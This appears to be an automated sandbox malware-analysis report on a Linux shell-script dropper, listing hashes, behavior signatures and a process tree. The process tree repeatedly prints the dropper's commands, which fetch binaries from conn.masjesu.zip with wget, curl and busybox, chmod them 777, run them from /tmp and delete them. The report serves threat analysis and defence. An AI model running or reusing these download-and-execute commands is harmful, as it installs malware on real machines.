Analysis
-
max time kernel
149s -
max time network
66s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
10-11-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
-
Size
10KB
-
MD5
2408085a258a318bc587e649a5e777ad
-
SHA1
7d4f24886ae9a4e5b0a1ee3866a311e53a29506d
-
SHA256
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537
-
SHA512
5f9ddc2e0b28f44731c0d27db88455b7154293933a0aaf1d0096344f618fe40fbd5ff45ef4a56ba2a17d8e77f6de838690f88856fdbaaea0ff16dd63183bb7fa
-
SSDEEP
192:Iw+LtUc+r7f932KtEsj+nmtUc+r7f62KtEsU8:Iw+eHp+nJ18
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 892 chmod 899 chmod 913 chmod 920 chmod 809 chmod 743 chmod 857 chmod 885 chmod 927 chmod 736 chmod 802 chmod 843 chmod 864 chmod 878 chmod 906 chmod 770 chmod 934 chmod 941 chmod 948 chmod 871 chmod -
Executes dropped EXE 20 IoCs
Processes:
d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0JV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRpgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3ymHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnFhwWR62XfsZaEQXPNSWWZ2esDst57v7Zudlnna1tBnMuEdluE4QBbRNp9nEdX5f9IHiugqScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvioc pid process /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 737 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 744 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 771 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 803 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 810 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 844 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 858 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 865 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 872 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 879 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 886 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF 893 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl 900 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug 907 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 914 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 921 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 928 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 935 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 942 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 949 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 62 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
curlcurlwgetwgetcurlcurlcurlwgetwgetcurlcurlwgetbusyboxbusyboxcurlwgetbusyboxwgetwgetcurlbusyboxbusyboxcurlcurlwgetcurlwgetwgetwgetbusyboxcurlbusyboxbusyboxwgetbusyboxbusyboxbusyboxwgetcurlbusyboxbusyboxcurlbusyboxwgetcurlwgetcurlwgetbusyboxbusyboxcurlwgetbusyboxwgetwgetbusyboxcurlcurlcurlbusyboxbusyboxwgetpid process 740 curl 952 curl 860 wget 895 wget 917 curl 938 curl 786 curl 813 wget 930 wget 910 curl 945 curl 739 wget 891 busybox 926 busybox 753 curl 902 wget 870 busybox 874 wget 888 wget 896 curl 940 busybox 801 busybox 824 curl 889 curl 916 wget 861 curl 944 wget 951 wget 709 wget 836 busybox 931 curl 947 busybox 808 busybox 881 wget 735 busybox 884 busybox 919 busybox 746 wget 882 curl 853 busybox 863 busybox 868 curl 905 busybox 909 wget 729 curl 848 wget 851 curl 867 wget 877 busybox 912 busybox 924 curl 937 wget 742 busybox 776 wget 923 wget 898 busybox 903 curl 806 curl 875 curl 933 busybox 763 busybox 805 wget -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF curl File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl
Processes
-
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- System Network Configuration Discovery
PID:709 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- System Network Configuration Discovery
PID:735 -
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:736 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:737 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:738
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- System Network Configuration Discovery
PID:739 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:740 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- System Network Configuration Discovery
PID:742 -
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:743 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:744 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:745
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:746 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:753 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:763 -
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:770 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:771 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:775
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:776 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:786 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:801 -
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:802 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:803 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:804
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:805 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:806 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:808 -
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:809 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:810 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:812
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:813 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:824 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:836 -
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:843 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:844 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:847
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:848 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:851 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:853 -
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:857 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:858 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:859
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:860 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:861 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:863 -
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:866
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:867 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:870 -
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:871 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:872 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:873
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- System Network Configuration Discovery
PID:874 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- System Network Configuration Discovery
PID:877 -
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:878 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:879 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:880
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- System Network Configuration Discovery
PID:881 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- System Network Configuration Discovery
PID:884 -
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:885 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:886 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:887
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- System Network Configuration Discovery
PID:888 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- System Network Configuration Discovery
PID:891 -
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:892 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:893 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:894
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- System Network Configuration Discovery
PID:895 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:896 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- System Network Configuration Discovery
PID:898 -
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:899 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:900 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:901
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- System Network Configuration Discovery
PID:902 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:903 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- System Network Configuration Discovery
PID:905 -
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:906 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:907 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:908
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:909 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:910 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:912 -
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:913 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:914 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:915
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:916 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:917 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:919 -
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:920 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:921 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:922
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:923 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:924 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:926 -
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:927 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:928 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:929
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:930 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:931 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:933 -
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:934 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:935 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:936
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:937 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:938 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
